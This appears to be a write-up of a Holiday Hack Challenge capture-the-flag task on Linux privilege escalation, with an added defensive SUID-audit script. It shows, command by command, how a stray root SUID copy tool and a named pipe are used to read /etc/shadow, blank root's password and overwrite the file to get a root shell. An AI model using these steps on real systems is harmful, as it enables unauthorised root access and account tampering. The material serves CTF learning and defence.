
Linux PrivEsc

Difficulty:
Direct link: https://hhc23-wetty.holidayhackchallenge.com?&challenge=linuxpriv

Objective

Request

Rosemold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

Rose Mold

What am I doing in this saloon? The better question is: what planet are you from?
Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.
Whatever. Do you know much about privilege escalation techniques on Linux?
You're asking why? How about I'll tell you why after you help me.
And you might have to use that big brain of yours to get creative, bub.

Hints

Linux Command Injection

From: Rose Mold

Using the privileged binary to overwrite a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument.

Linux Privilege Escalation Techniques

From: Rose Mold

There are various ways to escalate privileges on a Linux system.

Solution

A terminal window challenges us to

  • Find a method to escalate privileges inside this terminal and then run the binary in /root *

A classic way to escalate privileges on UNIX is an executable with the SUID bit set. Such a binary runs with the privileges (effective user ID) of its owner rather than of the user who starts it.

We search for SUID binaries:

$ find . -perm /u+s
find: './var/cache/ldconfig': Permission denied
find: './var/cache/apt/archives/partial': Permission denied
find: './var/lib/apt/lists/partial': Permission denied
./usr/bin/chfn
./usr/bin/chsh
./usr/bin/mount
./usr/bin/newgrp
./usr/bin/su
./usr/bin/gpasswd
./usr/bin/umount
./usr/bin/passwd
./usr/bin/simplecopy

Most of these are expected on a Linux system; the last one is not.
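The same search, turned into the check a defender would run: an added example, not part of the original writeup, that audits a tree for SUID executables missing from an expected baseline (the baseline is an assumption taken from the binaries listed above, and the demo tree is constructed in a temporary directory).

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a directory tree for
# SUID executables missing from an expected baseline, the defender-side check
# that would have flagged a stray binary like the writeup's /bin/simplecopy.

# Baseline of SUID basenames considered normal. Assumption: taken from the
# binaries the writeup calls "expected"; adjust it for your distribution.
SUID_BASELINE="chfn chsh mount newgrp su gpasswd umount passwd"

# Return 0 if basename $1 is in the baseline, 1 otherwise.
in_baseline() {
    for b in $SUID_BASELINE; do
        [ "$b" = "$1" ] && return 0
    done
    return 1
}

# Print every SUID regular file below $1 whose basename is NOT in the baseline,
# one per line as "path owner mode". Root-owned, world-executable entries
# (mode rwsr-xr-x) are the ones that matter most.
unexpected_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort | while IFS= read -r f; do
        in_baseline "$(basename "$f")" && continue
        set -- $(ls -ld "$f")      # $1 = mode string, $3 = owner
        printf '%s %s %s\n' "$f" "$3" "$1"
    done
}

# Build a constructed demo tree (expected SUID binary, stray SUID binary, and a
# non-SUID file) so the audit runs offline without touching the real system.
demo_tree() {
    d=$(mktemp -d)
    for name in passwd simplecopy; do
        printf '#!/bin/sh\n' > "$d/$name"
        chmod 4755 "$d/$name"      # rwsr-xr-x, like the writeup's simplecopy
    done
    printf '#!/bin/sh\n' > "$d/notsuid"
    chmod 755 "$d/notsuid"
    echo "$d"
}

# Example run: only the stray binary is reported.
demo_dir=$(demo_tree)
unexpected_suid "$demo_dir"
rm -rf "$demo_dir"
```

Run it against `/` (as root, so permission-denied directories are not skipped) and compare the output with a known-good baseline for the host.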

We check its permissions and owner:

$ ls -l /bin/simplecopy
-rwsr-xr-x 1 root root 16952 Dec  2 22:17 /bin/simplecopy

Perfect. Owned by root, executable by all users (which includes us), and with the SUID bit set.

If "simplecopy" does what its name implies, it should allow us to copy arbitrary files, including /etc/shadow, where user credentials are stored:

$ simplecopy -h
Usage: simplecopy <source> <destination>

$ simplecopy /etc/shadow .

This worked, but we still cannot read the copy, because simplecopy also preserves the owner and permissions of the source file.

$ ls -l shadow
-rw-r----- 1 root root 526 Dec 29 22:09 shadow

So we use a named pipe to receive the copied file and write its contents into another, readable file:

$ mkfifo shadow
$ cat shadow > shadow2&
$ simplecopy /etc/shadow .
[1]+  Done                    cat shadow > shadow2

We create a named pipe called "shadow" and attach a background "cat" to it. When simplecopy writes into the pipe, "cat" reads the contents and writes them to "shadow2", which is owned by us.

Now, we can access the content:

$ cat shadow2
root:*:19689:0:99999:7:::
daemon:*:19689:0:99999:7:::
bin:*:19689:0:99999:7:::
sys:*:19689:0:99999:7:::
sync:*:19689:0:99999:7:::
games:*:19689:0:99999:7:::
man:*:19689:0:99999:7:::
lp:*:19689:0:99999:7:::
mail:*:19689:0:99999:7:::
news:*:19689:0:99999:7:::
uucp:*:19689:0:99999:7:::
proxy:*:19689:0:99999:7:::
www-data:*:19689:0:99999:7:::
backup:*:19689:0:99999:7:::
list:*:19689:0:99999:7:::
irc:*:19689:0:99999:7:::
gnats:*:19689:0:99999:7:::
nobody:*:19689:0:99999:7:::
_apt:*:19689:0:99999:7:::
elf:!:19693:0:99999:7:::

We want to remove the asterisk in the first line, so that "root" has no password. The container seems to lack an editor, but we can simply paste the edited contents into another file with cat.

$ cat > shadow3
$ cat shadow3
root::19689:0:99999:7:::
daemon:*:19689:0:99999:7:::
bin:*:19689:0:99999:7:::
...

Now, we overwrite the original "/etc/shadow" with our version:

$ simplecopy shadow3 /etc/shadow

And root we become:

$ su
root@ffa9a0281a33:/home/elf# id
uid=0(root) gid=0(root) groups=0(root)

Time to complete the challenge:

root@ffa9a0281a33:/home/elf# cd /root
root@ffa9a0281a33:~# ls
runmetoanswer
root@ffa9a0281a33:~# ./runmetoanswer 
Who delivers Christmas presents?

> Santa
Your answer: Santa

Checking....
Sorry, that answer is incorrect. Please try again!


root@ffa9a0281a33:~# ./runmetoanswer 
Who delivers Christmas presents?

> santa
Your answer: santa

Checking....
Your answer is correct!

Well, at least on the second attempt. Capitalization seems important!

Quicker? Yes, but....

Crafting a one-line shadow file with just a password-less root user and overwriting /etc/shadow with it would have been much quicker. But that would likely have wreaked havoc on the other user accounts.

Images

screenshot

Answer

After solving the challenge, it is listed under "Achievements" in the player's badge.

Response

Rose Mold

Yup, I knew you knew. You just have that vibe.
To answer your question of why from earlier... Nunya!
But, I will tell you something better, about some information I... found.
There's a hidden, uncharted area somewhere along the coast of this island, and there may be more around the other islands.
The area is supposed to have something on it that's totes worth, but I hear all the bad vibe toys chill there.
That's all I got. K byyeeeee.
Ugh... n00bs...